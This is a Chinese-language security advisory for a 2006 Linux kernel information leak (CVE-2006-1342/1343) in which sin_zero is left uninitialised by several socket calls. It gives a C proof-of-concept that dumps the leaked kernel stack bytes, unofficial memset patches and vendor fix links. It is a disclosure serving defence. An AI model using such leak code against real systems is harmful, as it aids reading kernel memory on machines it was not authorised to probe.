安全研究
安全漏洞
Linux Kernel Ssockaddr_In.Sin_Zero Kernel内存泄露漏洞
发布日期:2006-03-23
更新日期:2006-11-14
受影响系统:
Linux kernel 2.6描述:
Linux kernel 2.4
VMWare ESX Server 2.5.4
VMWare ESX Server 2.5.3
VMWare ESX Server 2.1.3
VMWare ESX Server 2.0.2
BUGTRAQ ID: 17203
CVE(CAN) ID: CVE-2006-1342,CVE-2006-1343
Linux Kernel是开放源码操作系统Linux所使用的内核。
Linux Kernel在执行某些套接字函数时存在漏洞,可能导致泄露内核内存的某些数据。
Linux Kernel在调用某些套接字函数检索指定的套接字时,没有清零sockaddr_in.sin_zero数组便返回给用户空间程序。攻击者可以以SO_ORIGINAL_DST"选项调用getsockopt()函数,或调用getsockname()、getpeername和accept()函数,泄漏Kernel栈中6个未初始化的字节。
注意:getsockname()、getpeername()和accept()函数中的漏洞仅影响2.4 kernel。
<*来源:Pavel Kankovsky (peak@argo.troja.mff.cuni.cz)
链接:http://marc.theaimsgroup.com/?l=linux-netdev&m=114148078223594&w=2
http://secunia.com/advisories/22875/
http://lwn.net/Alerts/191267/?format=printable
http://lwn.net/Alerts/191268/?format=printable
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <linux/netfilter_ipv4.h>
void
dump(const unsigned char *p, unsigned l)
{
printf("data:");
while (l > 0) {
printf(" %02x", *p);
++p; --l;
}
printf("\n");
}
int
main(int argc, char **argv)
{
int port;
int ls, as, r, one;
struct sockaddr_in sa;
socklen_t sl;
if (argc != 2 || (port = atoi(argv[1])) == 0) {
fprintf(stderr, "usage: bug PORT\n");
return (1);
}
ls = socket(PF_INET, SOCK_STREAM, 0);
if (ls == -1) {
perror("ls = socket");
return (1);
}
one = 1;
r = setsockopt(ls, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));
if (r == -1) {
perror("setsockopt(ls)");
return (1);
}
sa.sin_family = PF_INET;
sa.sin_addr.s_addr = INADDR_ANY;
sa.sin_port = htons(port);
r = bind(ls, (struct sockaddr *) &sa, sizeof(sa));
if (r == -1) {
perror("bind(ls)");
return (1);
}
r = listen(ls, 1);
if (r == -1) {
perror("listen(ls)");
return (1);
}
sl = sizeof(sa);
as = accept(ls, (struct sockaddr *) &sa, &sl);
if (as == -1) {
perror("accept(ls)");
return (1);
}
dump((unsigned char *) &sa, sizeof(sa));
sl = sizeof(sa);
r = getsockname(as, (struct sockaddr *) &sa, &sl);
if (r == -1) {
perror("getsockname(as)");
return (1);
}
dump((unsigned char *) &sa, sizeof(sa));
sl = sizeof(sa);
r = getsockopt(as, SOL_IP, SO_ORIGINAL_DST, (struct sockaddr *) &sa, &sl);
if (r == -1) {
perror("getsockname(as)");
return (1);
}
dump((unsigned char *) &sa, sizeof(sa));
return (0);
}
建议:
厂商补丁:
Linux
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.kernel.org/
以下为2.4版本的非官方补丁:
--- linux/net/ipv4/af_inet.c.sockname Thu Feb 16 16:03:57 2006
+++ linux/net/ipv4/af_inet.c Thu Feb 16 16:25:02 2006
@@ -724,6 +724,7 @@
sin->sin_port = sk->sport;
sin->sin_addr.s_addr = addr;
}
+ memset(sin->sin_zero, 0, sizeof(sin->sin_zero));
*uaddr_len = sizeof(*sin);
return(0);
}
--- linux/net/ipv4/netfilter/ip_conntrack_core.c.sockname Thu Feb 16 16:03:58 2006
+++ linux/net/ipv4/netfilter/ip_conntrack_core.c Thu Feb 16 16:26:13 2006
@@ -1341,6 +1341,7 @@
.tuple.dst.u.tcp.port;
sin.sin_addr.s_addr = h->ctrack->tuplehash[IP_CT_DIR_ORIGINAL]
.tuple.dst.ip;
+ memset(sin.sin_zero, 0, sizeof(sin.sin_zero));
DEBUGP("SO_ORIGINAL_DST: %u.%u.%u.%u %u\n",
NIPQUAD(sin.sin_addr.s_addr), ntohs(sin.sin_port));
RedHat
------
RedHat已经为此发布了安全公告(RHSA-2006:0579-01,RHSA-2006:0580-01)以及相应补丁:
RHSA-2006:0579-01:Important: kernel security update
链接:http://lwn.net/Alerts/191267/?format=printable
RHSA-2006:0580-01:Moderate: kernel security update
链接:http://lwn.net/Alerts/191268/?format=printable
VMWare
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.vmware.com/download/esx/esx-253-200610-patch.html
http://www.vmware.com/download/esx/esx-254-200610-patch.html
http://www.vmware.com/download/esx/esx-213-200610-patch.html
http://www.vmware.com/download/esx/esx-202-200610-patch.html
浏览次数:3683
严重程度:0(网友投票)
绿盟科技给您安全的保障